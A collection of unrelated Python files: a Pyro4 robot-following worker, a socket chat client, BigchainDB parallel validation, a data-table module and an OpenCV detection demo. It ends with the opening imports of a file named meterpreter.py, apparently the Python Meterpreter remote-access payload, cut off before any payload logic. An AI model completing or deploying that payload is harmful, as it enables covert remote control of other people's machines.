| source | python |
|---|---|
worker3.py
|
from cerebral import logger as l
import logging
import Pyro4
from ares.main import Ares
from cerebral.nameserver import lookup, ports
from cerebral.pack1.hippocampus import Android
from threading import RLock, Thread, Event
import time
# Configure pyro.
Pyro4.config.SERIALIZERS_ACCEPTED = frozenset(['pickle', 'serpent'])
Pyro4.config.SERIALIZER = 'pickle'
super_agility = Pyro4.Proxy(lookup('worker1', 'super_agility'))
agility = Pyro4.Proxy(lookup('worker1', 'agility'))
super_theia = Pyro4.Proxy(lookup('worker2', 'super_theia'))
class SuperAres:
def __init__(self):
self.ares = Ares(Android.robot, Android.camera, Android.info)
self.thread = None
self.lock = RLock()
self.event = Event()
def start_follow(self):
with self.lock:
if self.thread is None:
self.thread = Thread(target=self._follow)
self.thread.start()
return True
return False
def stop(self):
with self.lock:
super_agility.stop()
super_theia.stop()
if self.thread is not None:
self.event.set()
self.thread.join()
self.thread = None
self.event.clear()
return True
def _follow(self):
# Stop robot, zero, and center head.
super_agility.stop()
super_agility.set_vector((0, 0))
agility.center_head()
if self.event.is_set():
return
# Find thing to follow.
blob = super_theia.find()
if blob is None:
return
# Get target information.
target_area = blob[2] * blob[3]
# Begin gait watcher.
super_agility.start_watch()
# Main loop.
lost_counter = 0
while not self.event.is_set():
found, bb, center = super_theia.get_status()
if found:
lost_counter = 0
# Target is good. First, get current data.
hr = agility.head_rotation()
area = bb[2] * bb[3]
x = center[0]
# Set head. This is more important than moving.
head_data = agility.look_at(center[0], center[1])
agility.move_head(head_data)
# Compute and set the direction vector.
vector = self.ares.compute_vector(target_area, area, x, hr)
super_agility.set_vector(vector)
else:
lost_counter += 1
if lost_counter > 10:
# A lot of lost frames. Target is probably out of head range. Center head, rotate body.
agility.center_head()
super_agility.set_vector((0, 0.15))
elif center is not None:
# Might have temporarily gone out of view. Scan head, auto velocity control.
agility.look_at(center[0], center[1])
agility.scan(0)
# Rest a bit; there is no need to loop much faster than
# human response time, which is around 200 ms.
time.sleep(0.05)
super_ares = SuperAres()
if __name__ == '__main__':
# Create a daemon.
port = ports['worker3']
daemon = Pyro4.Daemon('localhost', port)
# Register all objects.
daemon.register(super_ares, 'super_ares')
# Start event loop.
daemon.requestLoop()
|
client.py
|
import socket
import threading
flag = 0
s = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
hostname = input("Enter your host :: ")
s.connect((hostname , 1023))
nickname = input("Enter your Name :: ")
def receive():
global flag
while True:
try:
msg = s.recv(1024).decode("utf-8")
if msg == 'NICK':
print("Welcome to the chat room ::", nickname)
s.send(bytes(nickname, "utf-8"))
else:
print(msg)
except Exception:
print("An error occurred while receiving a message!")
s.close()
flag = 1
break
def write():
global flag
while True:
try:
reply_msg = f"{nickname} :: {input()}"
s.send(bytes(reply_msg, "utf-8"))
except Exception:
print("An error occurred while sending a message!")
s.close()
flag = 1
break
receive_thread = threading.Thread(target=receive)
receive_thread.start()
write_thread = threading.Thread(target=write)
write_thread.start()
|
parallel_validation.py
|
# Copyright BigchainDB GmbH and BigchainDB contributors
# SPDX-License-Identifier: (Apache-2.0 AND CC-BY-4.0)
# Code is Apache-2.0 and docs are CC-BY-4.0
import multiprocessing as mp
from collections import defaultdict
from bigchaindb import App, BigchainDB
from bigchaindb.tendermint_utils import decode_transaction
from abci import CodeTypeOk
class ParallelValidationApp(App):
def __init__(self, bigchaindb=None, events_queue=None, abci=None):
super().__init__(bigchaindb, events_queue, abci=abci)
self.parallel_validator = ParallelValidator()
self.parallel_validator.start()
def check_tx(self, raw_transaction):
return self.abci.ResponseCheckTx(code=CodeTypeOk)
def deliver_tx(self, raw_transaction):
self.parallel_validator.validate(raw_transaction)
return self.abci.ResponseDeliverTx(code=CodeTypeOk)
def end_block(self, request_end_block):
result = self.parallel_validator.result(timeout=30)
for transaction in result:
if transaction:
self.block_txn_ids.append(transaction.id)
self.block_transactions.append(transaction)
return super().end_block(request_end_block)
RESET = 'reset'
EXIT = 'exit'
class ParallelValidator:
def __init__(self, number_of_workers=mp.cpu_count()):
self.number_of_workers = number_of_workers
self.transaction_index = 0
self.routing_queues = [mp.Queue() for _ in range(self.number_of_workers)]
self.workers = []
self.results_queue = mp.Queue()
def start(self):
for routing_queue in self.routing_queues:
worker = ValidationWorker(routing_queue, self.results_queue)
process = mp.Process(target=worker.run)
process.start()
self.workers.append(process)
def stop(self):
for routing_queue in self.routing_queues:
routing_queue.put(EXIT)
def validate(self, raw_transaction):
dict_transaction = decode_transaction(raw_transaction)
index = int(dict_transaction['id'], 16) % self.number_of_workers
self.routing_queues[index].put((self.transaction_index, dict_transaction))
self.transaction_index += 1
def result(self, timeout=None):
result_buffer = [None] * self.transaction_index
for _ in range(self.transaction_index):
index, transaction = self.results_queue.get(timeout=timeout)
result_buffer[index] = transaction
self.transaction_index = 0
for routing_queue in self.routing_queues:
routing_queue.put(RESET)
return result_buffer
class ValidationWorker:
"""Run validation logic in a loop. This Worker is suitable for a Process
life: no thrills, just a queue to get some values, and a queue to return results.
Note that a worker is expected to validate multiple transactions in
multiple rounds, and it needs to keep in memory all transactions already
validated, until a new round starts. To trigger a new round of validation,
a ValidationWorker expects a `RESET` message. To exit the infinite loop the
worker is in, it expects an `EXIT` message.
"""
def __init__(self, in_queue, results_queue):
self.in_queue = in_queue
self.results_queue = results_queue
self.bigchaindb = BigchainDB()
self.reset()
def reset(self):
# We need a place to store already validated transactions,
# in case of dependent transactions in the same block.
# `validated_transactions` maps an `asset_id` to the list
# of all other transactions sharing the same asset.
self.validated_transactions = defaultdict(list)
def validate(self, dict_transaction):
try:
asset_id = dict_transaction['asset']['id']
except KeyError:
asset_id = dict_transaction['id']
transaction = self.bigchaindb.is_valid_transaction(
dict_transaction,
self.validated_transactions[asset_id])
if transaction:
self.validated_transactions[asset_id].append(transaction)
return transaction
def run(self):
while True:
message = self.in_queue.get()
if message == RESET:
self.reset()
elif message == EXIT:
return
else:
index, transaction = message
self.results_queue.put((index, self.validate(transaction)))
|
data_table.py
|
# Copyright 2017 James P Goodwin data table package to manage sparse columnar data
""" module that implement a data table package to manage sparse columnar data window and refresh them automatically """
import sys
import os
from datetime import datetime
from dateutil import parser
import threading
import time
import csv
import json
from functools import wraps
string_type = '_string'
float_type = '_float'
int_type = '_int'
date_type = '_date'
blank_type = '_blank'
def format_string( s ):
return str(s)
def format_date( d ):
return d.strftime("%m/%d/%y %H:%M")
def format_float( d ):
if d >= 1000 and d < 1000000:
return "%.0fK"%(d/1000)
elif d >= 1000000 and d < 1000000000:
return "%.0fM"%(d/1000000)
elif d >= 1000000000:
return "%.0fG"%(d/1000000000)
else:
return "%.2f"%d
def format_int( d ):
if d >= 1000 and d < 1000000:
return "%dK"%(d//1000)
elif d >= 1000000 and d < 1000000000:
return "%dM"%(d//1000000)
elif d >= 1000000000:
return "%dG"%(d//1000000000)
else:
return "%d"%d
class Cell(object):
def __init__(self,type,value,format):
self.type = type
self.value = value
self.format = format
def __str__(self):
return self.format(self.value)
def get_type(self):
return self.type
def get_value(self):
return self.value
def put_value(self,value):
self.value = value
def get_float_value(self):
if self.type in [float_type,int_type]:
return float(self.value)
elif self.type == date_type:
return self.value.timestamp()
else:
return 0.0
def get_format(self):
return self.format
def set_format(self,format):
self.format = format
blank_cell = Cell(blank_type,"",lambda x: "")
class ColumnIterator(object):
def __init__(self,column):
self.column = column
self.idx = 0
self.limit = column.size()
def __iter__(self):
return self
def __next__(self):
if self.idx >= self.limit:
raise StopIteration
ret = self.column.get(self.idx)
self.idx += 1
return ret
class Column(object):
def __init__(self,values=None,idx=0,name=None,table=None):
""" accept a list of Cell objects, a column index, and a column name, and a table to be a part of """
self.values = values if values else []
self.idx = idx
self.name = name
self.table = table
def size(self):
""" get the size of this column """
return len(self.values)
def delete(self,idx):
if idx < len(self.values):
del self.values[idx]
def ins(self,idx,value):
if idx <= len(self.values):
self.values.insert(idx,value)
else:
self.put(idx,value)
def get(self,idx):
""" get the cell at index idx in column """
if idx < len(self.values):
return self.values[idx]
else:
return blank_cell
def put(self,idx,value):
""" put a Cell value at index idx in column """
if idx < len(self.values):
self.values[idx] = value
return
if idx == len(self.values):
self.values.append(value)
return
elif idx > len(self.values):
while idx >= len(self.values):
self.values.append(blank_cell)
self.values[idx] = value
return
def get_name(self):
return self.name
def set_name(self,name):
self.name = name
def get_idx(self):
return self.idx
def set_idx(self,idx):
self.idx = idx
def get_table(self):
return self.table
def set_table(self,table):
self.table = table
blank_column = Column()
def synchronized(method):
@wraps(method)
def wrapper(self, *args, **kwargs):
with self.refresh_lock:
return method(self, *args, **kwargs)
return wrapper
# format of data table as json
# {
# "name" : name of the table,
# "refresh_minutes" : refresh interval in minutes,
# "columns" : [ array of column structures
# {
# "name": column name
# "values" : [ array of cells in column
# {
# "type" : one of "_string","_float","_int","_date","_blank"
# "value" : string, float, int, float for date, or "" for blank
# },
# ]
# },
# ]
# }
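# a small illustrative example of the layout above (all values are made up):
# {
#   "name": "sample",
#   "refresh_minutes": 5,
#   "columns": [
#     { "name": "price",
#       "values": [
#         { "type": "_float", "value": 12.5 },
#         { "type": "_date", "value": 1577836800.0 },
#         { "type": "_blank", "value": "" }
#       ]
#     }
#   ]
# }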
def from_json( stream ):
""" load a DataTable from a stream as JSON, return new DataTable """
jtable = json.load(stream)
dt = DataTable(None,jtable.get("name","JSON DataTable"),jtable.get("refresh_minutes",1))
for c in jtable["columns"]:
nc = Column( name = c.get("name", None) )
for v in c["values"]:
ct = v["type"]
cv = v["value"]
if ct == string_type:
cc = Cell(string_type,cv,format_string)
elif ct == float_type:
cc = Cell(float_type,cv,format_float)
elif ct == int_type:
cc = Cell(int_type,cv,format_int)
elif ct == date_type:
cc = Cell(date_type,datetime.fromtimestamp(cv),format_date)
elif ct == blank_type:
cc = blank_cell
nc.put(nc.size(),cc)
dt.add_column( nc )
return dt
def to_json( dt, stream ):
""" write a DataTable to a stream as JSON """
out_dict = {}
if dt.name:
out_dict["name"] = dt.name
out_dict["refresh_minutes"] = dt.refresh_minutes
columns = []
for idx in range(len(dt.columns)):
dtc = dt.columns[idx]
column = {}
if dtc.name:
column["name"] = dtc.name
values = []
for dtv in dtc.values:
values.append( { "type":dtv.type, "value": ( dtv.value if dtv.type != date_type else dtv.get_float_value() ) } )
column["values"] = values
columns.append(column)
out_dict["columns"] = columns
json.dump(out_dict,stream)
# csv representation of a DataTable
# heading row at the top
# each column heading is of the form: table name_column name_type
# names cannot contain '_', the type suffix is used to load the cells,
# and a column can't have mixed cell types
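# an illustrative example of the layout above (a hypothetical table "prices"
# with two columns; the values are made up):
#
#   prices_symbol_string,prices_close_float
#   IBM,125.31
#   MSFT,210.04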
def from_csv( stream, name=None, field_map=None ):
""" load a DataTable from a stream as CSV, return new DataTable, you can provide an override to the default parsing to provide a name and a field_map which is a list of tuples CSV_column_name,DataTable_column_name,DataTable_type it will only load columns in the column map """
dt = None
dr = csv.DictReader(stream)
for drr in dr:
for drc in drr:
parts = drc.split("_",2)
if not dt:
if name:
dt = DataTable(name=name)
elif not field_map and len(parts) == 3:
dt = DataTable(name=parts[0])
else:
dt = DataTable()
dtc = None
dtt = None
if field_map:
for fm in field_map:
if drc == fm[0]:
dtc = fm[1]
dtt = fm[2]
break
else:
if len(parts) == 3:
dtc = parts[1]
dtt = "_"+parts[2]
if dtc and dtt:
if not dt.has_column(dtc):
dt.add_column(Column(name=dtc))
dtcc = dt.get_column(dtc)
drv = drr[drc]
if drv and dtt == string_type:
cc = Cell(string_type,drv,format_string)
elif drv and dtt == float_type:
cc = Cell(float_type,float(drv),format_float)
elif drv and dtt == int_type:
cc = Cell(int_type,int(drv),format_int)
elif drv and dtt == date_type:
try:
cc = Cell(date_type,datetime.fromtimestamp(float(drv)),format_date)
except:
cc = Cell(date_type,parser.parse(drv),format_date)
elif not drv or dtt == blank_type:
cc = blank_cell
dtcc.put(dtcc.size(),cc)
return dt
def to_csv( dt, stream ):
""" write a DataTable to a stream as CSV, see standard format in comments above, type for column is based on the zeroth cell """
field_names = []
idx = 0
max_idx = 0
for c in dt.columns:
type = blank_type
for tidx in range(c.size()):
if c.get(tidx).type != blank_type:
type = c.get(tidx).type
break
field_names.append((dt.name if dt.name else "DataTable")+"_"+(c.name if c.name else "Column %d"%idx)+type)
idx += 1
if c.size() > max_idx:
max_idx = c.size()
wcsv = csv.DictWriter(stream,field_names)
for wcridx in range(max_idx):
wcr = {}
for idx in range(len(dt.columns)):
cell = dt.columns[idx].get(wcridx)
wcr[field_names[idx]] = (cell.get_value() if cell.type != date_type else cell.get_float_value())
if wcridx == 0:
wcsv.writeheader()
wcsv.writerow(wcr)
class DataTable(object):
def __init__(self,columns=None,name=None,refresh_minutes=10):
""" accepts a list of columns and a name for the table """
self.listeners = []
self.columns = []
self.name = name
self.cnames = {}
self.refresh_lock = threading.RLock()
self.refresh_minutes = refresh_minutes
self.refresh_thread = None
self.refresh_thread_stop = False
self.refresh_timestamp = None
if columns:
for c in columns:
self.add_column(c)
def get_refresh_timestamp( self ):
""" get the time that the table was last refreshed """
return self.refresh_timestamp
def acquire_refresh_lock(self):
""" acquire the refresh lock before reading/writing the table state """
self.refresh_lock.acquire()
def release_refresh_lock(self):
""" release the refresh lock after reading/writing the table state """
self.refresh_lock.release()
def start_refresh( self ):
""" Start the background refresh thread """
self.stop_refresh()
self.refresh_thread = threading.Thread(target=self.perform_refresh)
self.refresh_thread.start()
def perform_refresh( self ):
""" Thread worker that sleeps and refreshes the data on a schedule """
start_time = time.time()
while not self.refresh_thread_stop:
if time.time() - start_time >= self.refresh_minutes*60.0:
self.refresh()
start_time = time.time()
time.sleep(1)
def stop_refresh( self ):
""" Stop the background refresh thread """
self.refresh_thread_stop = True
if self.refresh_thread and self.refresh_thread.is_alive():
self.refresh_thread.join()
self.refresh_thread = None
self.refresh_thread_stop = False
def listen(self,listen_func):
""" register for notifications when a change event is raised on this table """
self.listeners.append(listen_func)
def unlisten(self,listen_func):
""" unregister for notifications when a change event is raised on this table """
self.listeners.remove(listen_func)
def changed(self):
""" notify listeners that this table has been changed """
for f in self.listeners:
f(self)
@synchronized
def get_bounds(self):
""" return a tuple (rows,cols) where rows is the maximum number of rows and cols is the maximum number of cols """
cols = len(self.columns)
rows = -1
for c in self.columns:
size = c.size()
if rows < 0 or size > rows:
rows = size
return (rows,cols)
def get_name(self):
""" return the name of the table """
return self.name
@synchronized
def get_names(self):
""" return a list of the names of the columns in order"""
return [c.get_name() for c in self.columns]
@synchronized
def get_columns(self):
""" return the list of columns """
return self.columns
@synchronized
def add_column(self,column):
idx = len(self.columns)
column.set_idx(idx)
if not column.get_name():
column.set_name("%s_%d"%(self.name,idx))
self.columns.append(column)
self.cnames[column.get_name()] = column
column.set_table(self)
@synchronized
def insert_column(self,idx,column):
while idx > len(self.columns):
self.add_column(blank_column)
if idx == len(self.columns):
self.add_column(column)
else:
if not column.get_name():
column.set_name("%s_%d"%(self.name,idx))
self.columns.insert(idx,column)
self.cnames[column.get_name()] = column
column.set_table(self)
while idx < len(self.columns):
col = self.columns[idx]
if col.get_name() == "%s_%d"%(self.name,idx-1):
col.set_name("%s_%d"%(self.name,idx))
self.cnames[col.get_name()] = col
col.set_idx(idx)
idx += 1
@synchronized
def replace_column(self,idx,column):
column.set_idx(idx)
if not column.get_name():
column.set_name("%s_%d"%(self.name,idx))
if idx == len(self.columns):
self.columns.append(column)
else:
del self.cnames[self.columns[idx].get_name()]
self.columns[idx] = column
self.cnames[column.get_name()] = column
column.set_table(self)
@synchronized
def map_column(self, reference ):
if type(reference) == str:
return self.cnames[reference].get_idx()
elif type(reference) == int:
return reference
else:
raise TypeError("wrong type in mapping")
@synchronized
def has_column(self, reference ):
if type(reference) == str:
return reference in self.cnames
elif type(reference) == int:
return reference < len(self.columns)
else:
return False
@synchronized
def get_column(self, reference):
return self.columns[self.map_column(reference)]
@synchronized
def get(self, row, reference ):
return self.columns[self.map_column(reference)].get(row)
@synchronized
def put(self, row, reference, value):
self.columns[self.map_column(reference)].put(row,value)
@synchronized
def refresh(self):
""" base class method for forcing a refresh on a table """
self.refresh_timestamp = time.time()
|
testM3.py
|
#!/usr/bin/python
import os
import sys
import numpy as np
import cv2
import time
import threading
from multiprocessing import Process, Queue, Pipe, Manager, Lock
print(os.path.dirname(__file__))
print(os.path.basename(__file__))
print(sys.version_info)
print(cv2.__version__)
class fpsWithTick(object):
def __init__(self):
self._count = 0
self._oldCount = 0
self._freq = 1000 / cv2.getTickFrequency()
self._startTime = cv2.getTickCount()
def get(self):
nowTime = cv2.getTickCount()
diffTime = (nowTime - self._startTime) * self._freq
self._startTime = nowTime
fps = (self._count - self._oldCount) / (diffTime / 1000.0)
self._oldCount = self._count
self._count += 1
fpsRounded = round(fps, 2)
return fpsRounded
def view_thresh(cn_r,cn_s):
print("thresh init")
proc_width = 480
proc_height = 270
view_width = 240
view_height = 135
blue_img = np.zeros((135,240,3), np.uint8)
cv2.rectangle(blue_img,(0,0),(240,135),(255,0,0),cv2.cv.CV_FILLED)
cv2.putText(blue_img, "No Data !", (40,80), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0,0,255))
print("thresh start")
fps_class = fpsWithTick()
while True:
if not cn_r.empty():
image = cn_r.get()
if image is None:
print("thresh None")
break
#print("thresh run")
image2_img = image.copy()
#image2_hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
#image2_chan = cv2.split(image2_hsv)
#image2_chan[2] = cv2.equalizeHist(image2_chan[2])
#image2_hsv = cv2.merge(image2_chan)
#image2_img = cv2.cvtColor(image2_hsv, cv2.COLOR_HSV2BGR)
gray = cv2.cvtColor(image2_img, cv2.COLOR_BGR2GRAY)
proc_gray = cv2.resize(gray, (proc_width, proc_height))
proc_gray = cv2.equalizeHist(proc_gray)
proc_thresh = cv2.blur(proc_gray, (5,5), 0)
_, proc_thresh = cv2.threshold(proc_thresh, 112, 255, cv2.THRESH_BINARY)
proc_thresh = cv2.bitwise_not(proc_thresh)
proc_mask = cv2.cvtColor(proc_thresh, cv2.COLOR_GRAY2RGB)
proc_img = cv2.resize(image2_img, (proc_width, proc_height))
proc_img = cv2.bitwise_and(proc_img, proc_mask)
cnts0 = cv2.findContours(proc_thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[0]
cnts0.sort(key=cv2.contourArea, reverse=True)
cnts1 = [cnt for cnt in cnts0 if cv2.contourArea(cnt) > 500]
for i, c in enumerate(cnts1):
cv2.drawContours(proc_img, [c], -1, (255, 0, 0), 2)
al = cv2.arcLength(c, True) * 0.01
c2 = cv2.approxPolyDP(c, al, True)
cv2.drawContours(proc_img, [c2], -1, (0, 255, 0), 2)
arc_area = cv2.contourArea(c2)
x,y,w,h = cv2.boundingRect(c2)
hit_area = w * h
if (arc_area/hit_area) > 0.8:
cv2.rectangle(proc_img, (x,y), (x+w,y+h), (0,0,255), 2)
view_img = cv2.resize(proc_img, (view_width, view_height))
cv2.putText(view_img, "THRESH", (40,30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (255,0,255))
str_fps = str(fps_class.get())
cv2.putText(view_img, str_fps, (40,45), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0,0,255))
cn_s.put( view_img.copy() )
thresh = cv2.resize(proc_img, (480, 270))
cn_s.put( thresh.copy() )
time.sleep(0.1)
print("thresh end")
def view_canny(cn_r,cn_s):
print("canny init")
proc_width = 480
proc_height = 270
view_width = 240
view_height = 135
blue_img = np.zeros((135,240,3), np.uint8)
cv2.rectangle(blue_img,(0,0),(240,135),(255,0,0),cv2.cv.CV_FILLED)
cv2.putText(blue_img, "No Data !", (40,80), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0,0,255))
print("canny start")
fps_class = fpsWithTick()
while True:
if not cn_r.empty():
image = cn_r.get()
if image is None:
print("canny None")
break
#print("canny run")
image2_img = image.copy()
#image2_hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
#image2_chan = cv2.split(image2_hsv)
#image2_chan[2] = cv2.equalizeHist(image2_chan[2])
#image2_hsv = cv2.merge(image2_chan)
#image2_img = cv2.cvtColor(image2_hsv, cv2.COLOR_HSV2BGR)
gray = cv2.cvtColor(image2_img, cv2.COLOR_BGR2GRAY)
proc_gray = cv2.resize(gray, (proc_width, proc_height))
proc_gray = cv2.equalizeHist(proc_gray)
proc_gray = cv2.blur(proc_gray, (5,5), 0)
#_, proc_thresh = cv2.threshold(proc_gray, 128, 255, cv2.THRESH_BINARY)
#proc_thresh = cv2.bitwise_not(proc_thresh)
#proc_canny = cv2.Canny(proc_thresh, threshold1=80, threshold2=110)
proc_canny = cv2.Canny(proc_gray, threshold1=80, threshold2=110)
proc_over = cv2.cvtColor(proc_canny, cv2.COLOR_GRAY2BGR)
proc_img = cv2.resize(image2_img,(proc_width, proc_height))
proc_img = cv2.bitwise_or(proc_img, proc_over)
lines = cv2.HoughLines(proc_canny, 1.1, np.pi/180, 150)
if lines is not None:
for rho,theta in lines[0]:
a=np.cos(theta)
b=np.sin(theta)
x0 = a * rho
y0 = b * rho
x1 = int(x0 + 1000 * (-b))
y1 = int(y0 + 1000 * (a))
x2 = int(x0 - 1000 * (-b))
y2 = int(y0 - 1000 * (a))
cv2.line(proc_img, (x1, y1), (x2, y2), (255,0,0), 1)
lines = cv2.HoughLinesP(proc_canny, 3, np.pi/180, 10, 50, 50)
if lines is not None:
for (x1, y1, x2, y2) in lines[0]:
cv2.line(proc_img, (x1, y1), (x2, y2), (0,255,0), 2)
circles = cv2.HoughCircles(proc_canny, cv2.cv.CV_HOUGH_GRADIENT, dp=1.5, minDist=80, minRadius=10, maxRadius=80)
if circles is not None:
circles = np.uint16(np.around(circles))
for (x, y, r) in circles[0,:]:
cv2.circle(proc_img, (x, y), r, (0,0,255), 2)
view_img = cv2.resize(proc_img, (view_width, view_height))
cv2.putText(view_img, "CANNY", (40,30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (255,0,255))
str_fps = str(fps_class.get())
cv2.putText(view_img, str_fps, (40,45), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0,0,255))
cn_s.put( view_img.copy() )
canny = cv2.resize(proc_img, (480, 270))
cn_s.put( canny.copy() )
time.sleep(0.1)
print("canny end")
def view_procD(cn_r,cn_s):
print("procD init")
proc_width = 320
proc_height = 180
view_width = 480
view_height = 270
hit_width = 240
hit_height = 240
blue_img = np.zeros((135,240,3), np.uint8)
cv2.rectangle(blue_img,(0,0),(240,135),(255,0,0),cv2.cv.CV_FILLED)
cv2.putText(blue_img, "No Data !", (40,80), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0,0,255))
casname = cn_r.get()
cascade = cv2.CascadeClassifier(casname)
haar_scale = 1.1
min_neighbors = 2
min_size = (10, 10)
print("procD start")
fps_class = fpsWithTick()
while True:
if not cn_r.empty():
image = cn_r.get()
if image is None:
print("procD None")
break
#print("procD run")
image2_height, image2_width = image.shape[:2]
image2_hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
image2_chan = cv2.split(image2_hsv)
image2_chan[2] = cv2.equalizeHist(image2_chan[2])
image2_hsv = cv2.merge(image2_chan)
image2_img = cv2.cvtColor(image2_hsv, cv2.COLOR_HSV2BGR)
proc_img = cv2.resize(image2_img,(proc_width, proc_height))
proc_gray = cv2.cvtColor(proc_img, cv2.COLOR_BGR2GRAY)
proc_gray = cv2.equalizeHist(proc_gray)
view_img = cv2.resize(image2_img,(view_width, view_height))
rects = cascade.detectMultiScale(proc_gray, scaleFactor=haar_scale, minNeighbors=min_neighbors, minSize=min_size)
if rects is not None:
for (hit_x, hit_y, hit_w, hit_h) in rects:
x = int(hit_x * image2_width / proc_width)
y = int(hit_y * image2_height / proc_height)
w = int(hit_w * image2_width / proc_width)
h = int(hit_h * image2_height / proc_height)
hit_img = cv2.resize(image2_img[y:y+h, x:x+w],(hit_width,hit_height))
cn_s.put( hit_img.copy() )
lx = int(hit_x * view_width / proc_width)
ly = int(hit_y * view_height / proc_height)
lw = int(hit_w * view_width / proc_width)
lh = int(hit_h * view_height / proc_height)
lxw = lx + lw
lyh = ly + lh
cv2.rectangle(view_img, (lx,ly), (lxw,lyh), (0,0,255), 2)
cv2.putText(view_img, casname, (40,30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (255,0,255))
str_fps = str(fps_class.get())
cv2.putText(view_img, str_fps, (40,80), cv2.FONT_HERSHEY_COMPLEX_SMALL, 2, (0,0,255))
cn_s.put( view_img.copy() )
time.sleep(0.1)
print("procD end")
if __name__ == '__main__':
print("main init")
dev = "0"
cas = "face.xml"
if len(sys.argv)==2 and sys.argv[1].isdigit():
dev = sys.argv[1]
elif len(sys.argv)==2:
cas = sys.argv[1]
elif len(sys.argv)==3 and sys.argv[2].isdigit():
cas = sys.argv[1]
dev = sys.argv[2]
elif len(sys.argv)==3 and sys.argv[1].isdigit():
cas = sys.argv[2]
dev = sys.argv[1]
elif len(sys.argv)==3:
cas = sys.argv[1]
dev = sys.argv[2]
live_width = 240
live_height = 135
image_width = 480
image_height = 270
blue_img = np.zeros((live_height,live_width,3), np.uint8)
cv2.rectangle(blue_img,(0,0),(live_width,live_height),(255,0,0),cv2.cv.CV_FILLED)
cv2.putText(blue_img, "No Data !", (40,80), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0,0,255))
image_img = cv2.resize(blue_img, (image_width, image_height))
image_thresh = image_img.copy()
image_canny = image_img.copy()
cv2.namedWindow("Live", 1)
cv2.imshow( "Live", blue_img)
cv2.moveWindow( "Live", 0, 25)
cv2.namedWindow("Thresh", 1)
cv2.imshow( "Thresh", blue_img)
cv2.moveWindow( "Thresh", 240, 25)
cv2.namedWindow("Canny", 1)
cv2.imshow( "Canny", blue_img)
cv2.moveWindow( "Canny", 480, 25)
cv2.namedWindow("Detect", 1)
cv2.imshow( "Detect", image_img)
cv2.moveWindow( "Detect", 0, 200)
cv2.namedWindow("Hit", 1)
cv2.imshow( "Hit", blue_img)
cv2.moveWindow( "Hit", 480, 200)
capture = None
if dev.isdigit():
capture = cv2.VideoCapture(int(dev))
capture.set(cv2.cv.CV_CAP_PROP_FRAME_WIDTH, 640)
capture.set(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT, 480)
capture.set(cv2.cv.CV_CAP_PROP_FPS, 15)
else:
capture = cv2.VideoCapture(dev)
print("main start")
thresh_proc = None
canny_proc = None
procD_proc = None
fps_class = fpsWithTick()
while True:
ret, frame = capture.read()
if not ret:
cv2.imshow("Live", blue_img )
print("capture error")
time.sleep(10.0)
break
else:
#print("main run")
frame_height, frame_width = frame.shape[:2]
frame_height2 = frame_width * image_height // image_width
if frame_height2 == frame_height:
image_img = cv2.resize(frame, (image_width, image_height))
else:
h = (frame_height - frame_height2) // 2
image_img = cv2.resize(frame[h:h+frame_height2, 0:frame_width], (image_width, image_height))
live_img = cv2.resize(image_img, (live_width, live_height))
str_src = str(frame_width) + "x" + str(frame_height)
str_fps = str(fps_class.get())
cv2.putText(live_img, str_src, (40,30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (255,0,255))
cv2.putText(live_img, str_fps, (40,45), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0,0,255))
#cv2.imshow("Live", live_img)
if thresh_proc is None:
thresh_s = Queue()
thresh_r = Queue()
thresh_proc = threading.Thread(target=view_thresh, args=(thresh_s,thresh_r,))
thresh_proc.daemon = True
thresh_beat = time.time()
thresh_s.put( image_img.copy() )
thresh_proc.start()
if thresh_r.empty():
cv2.line(live_img, (0, 1), (0+79, 1), (0,0,255), 3)
else:
cv2.line(live_img, (0, 1), (0+79, 1), (255,0,0), 3)
thresh_beat = time.time()
img = thresh_r.get()
cv2.imshow("Thresh", img )
image_thresh = thresh_r.get()
thresh_s.put( image_img.copy() )
if (time.time() - thresh_beat) > 10:
print("thresh 10s")
break
if canny_proc is None:
canny_s = Queue()
canny_r = Queue()
canny_proc = threading.Thread(target=view_canny, args=(canny_s,canny_r,))
canny_proc.daemon = True
canny_beat = time.time()
canny_s.put( image_img.copy() )
canny_proc.start()
if canny_r.empty():
cv2.line(live_img, (80, 1), (80+79, 1), (0,0,255), 3)
else:
cv2.line(live_img, (80, 1), (80+79, 1), (255,0,0), 3)
canny_beat = time.time()
img = canny_r.get()
cv2.imshow("Canny", img )
image_canny = canny_r.get()
canny_s.put( image_img.copy() )
if (time.time() - canny_beat) > 10:
print("canny 10s")
break
if procD_proc is None:
procD_s = Queue()
procD_r = Queue()
procD_proc = threading.Thread(target=view_procD, args=(procD_s,procD_r,))
procD_proc.daemon = True
procD_beat = time.time()
procD_s.put(cas)
procD_s.put( image_img.copy() )
procD_proc.start()
if procD_r.empty():
cv2.line(live_img, (160, 1), (160+79, 1), (0,0,255), 3)
else:
cv2.line(live_img, (160, 1), (160+79, 1), (255,0,0), 3)
procD_beat = time.time()
while not procD_r.empty():
img = procD_r.get()
img_h, img_w = img.shape[:2]
if img_w != 480:
cv2.imshow("Hit", img )
else:
cv2.imshow("Detect", img )
procD_s.put( image_img.copy() )
if (time.time() - procD_beat) > 10:
print("procD 10s")
break
cv2.imshow("Live", live_img )
if cv2.waitKey(10) >= 0:
break
time.sleep(0.01)
print("main terminate")
if thresh_proc is not None:
thresh_s.put(None)
canny_s.put(None)
procD_s.put(None)
time.sleep(3)
thresh_s.close()
thresh_r.close()
canny_s.close()
canny_r.close()
procD_s.close()
procD_r.close()
capture.release()
cv2.destroyAllWindows()
print("main Bye!")
|
meterpreter.py
|
#!/usr/bin/python
import binascii
import code
import os
import platform
import random
import re
import select
import socket
import struct
import subprocess
import sys
import threading
import time
import traceback
try:
import ctypes
except ImportError:
has_windll = False
else:
